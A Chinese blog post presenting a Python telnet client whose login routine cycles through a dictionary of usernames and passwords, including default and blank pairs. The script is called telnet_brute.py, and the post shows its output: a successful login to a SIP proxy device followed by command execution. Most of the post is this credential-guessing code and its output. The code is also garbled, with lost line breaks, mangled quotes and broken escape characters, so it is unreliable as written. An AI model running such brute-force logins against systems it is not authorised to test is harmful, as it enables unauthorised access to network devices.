閱讀目錄

源碼請參考：starnightcyber/scripts

主要使用TelnetClient類，封裝了登錄和執(zhí)行命令的基本操作。

源碼如下，或請查看：scripts/telnet/telnet.py

telnet協(xié)議是TCP/IP協(xié)議族中的一員，是Internet遠(yuǎn)程登陸服務(wù)的標(biāo)準(zhǔn)協(xié)議和主要方式。它為用戶提供了在本地計(jì)算機(jī)上完成遠(yuǎn)程主機(jī)工作的能力。在終端使用者的電腦上使用telnet程序，用它連接到服務(wù)器。

終端使用者可以在telnet程序中輸入命令，這些命令會在服務(wù)器上運(yùn)行，就像直接在服務(wù)器的控制臺上輸入一樣,可以在本地就能控制服務(wù)器。要開始一個(gè)telnet會話，必須輸入用戶名和密碼來登錄服務(wù)器,Telnet是常用的遠(yuǎn)程控制Web服務(wù)器的方法。

代碼如下

#!/usr/bin/env python# -*- coding:utf-8 -*-import loggingimport telnetlibimport time# telnet登錄認(rèn)證相關(guān)auth = { 'user_prompt': b’Username:’, # 輸入用戶名提示 'password_prompt': b’Password:’, # 輸入密碼提示 'enter': b’r’, # 回車 'remote_enter': b’nr’,}class TelnetClient(object): def __init__(self): self.tn = telnetlib.Telnet() # Telnet client def login(self, ip, port, tel_dict): ''' telnet 登錄 :param ip: 目標(biāo)ip :param port: 目標(biāo)端口 :param tel_dict: 密碼字典 :return: 登錄成功(True) or 登錄失敗(False) ''' msg = ’trying to login {}:{} telnet service’.format(ip, port) print(msg) # telnet登錄 for username, password in tel_dict.items(): # 創(chuàng)建一個(gè)telnet連接 try:self.tn.open(ip, port) except:logging.warning(’%s網(wǎng)絡(luò)連接失敗’ % ip)return False, ’’ msg = ’try user:[{}], password:[{}]’.format(username, password) print(msg) # 登錄嘗試 try:# 等待輸入用戶名提示user_prompt出現(xiàn)后，輸入用戶名self.tn.read_until(auth[’user_prompt’], timeout=3)self.tn.write(username.encode(’ascii’) + auth[’enter’])# 等待輸入密碼提示password_prompt出現(xiàn)后，輸入密碼self.tn.read_until(auth[’password_prompt’], timeout=3)self.tn.write(password.encode(’ascii’) + auth[’enter’])# 延時(shí)兩秒再收取返回結(jié)果，給服務(wù)端足夠響應(yīng)時(shí)間time.sleep(2)# 獲取登錄結(jié)果, read_very_eager()獲取到的是的是上次獲取之后本次獲取之前的所有輸出command_result = self.tn.read_very_eager().decode(’ascii’)# print(’===>’, command_result)prompt, _ = command_result.split(’->’)# print(’===>’, prompt.strip())# 如果返回的結(jié)果中沒有提示輸入用戶名，表示登錄成功if auth[’user_prompt’] not in command_result.encode(’ascii’): print(’登錄成功’) return Trueelse: continue except:pass return False def execute_command(self, command): ''' 執(zhí)行一些命令 :param command: 要執(zhí)行的命令 :return: None ''' try: self.tn.write(command.encode(’ascii’) + auth[’enter’]) time.sleep(2) # 獲取命令結(jié)果 command_result = self.tn.read_very_eager().decode(’ascii’) print(’==>’, command_result) except: print(’something went wrong...’) pass # 退出telnet，保留 def logout_host(self): self.tn.write(b'byer')if __name__ == ’__main__’: # 參數(shù) ip = ’172.16.176.120’ port = ’2570’ tel_dict = {’admin’: ’admin’, ’aaa’: ’bbb’, ’’: ’’} # 登陸 tn = TelnetClient() tn.login(ip, port, tel_dict) # 執(zhí)行命令 command = ’ver’ tn.execute_command(command) # 退出 tn.logout_host()

執(zhí)行輸出如下：

# python3 telnet_brute.pytrying to login 172.16.176.120:2570 telnet servicetry user:[admin], password:[admin]try user:[aaa], password:[bbb]try user:[], password:[]登錄成功==> ver Version :PAS_SIPPROXY_6.0.0.3.0.190831, Compile Time: 16:18:41, Feb 25 2020Return value: 1SipPrxoy->

以上就是本文的全部內(nèi)容，希望對大家的學(xué)習(xí)有所幫助，也希望大家多多支持好吧啦網(wǎng)。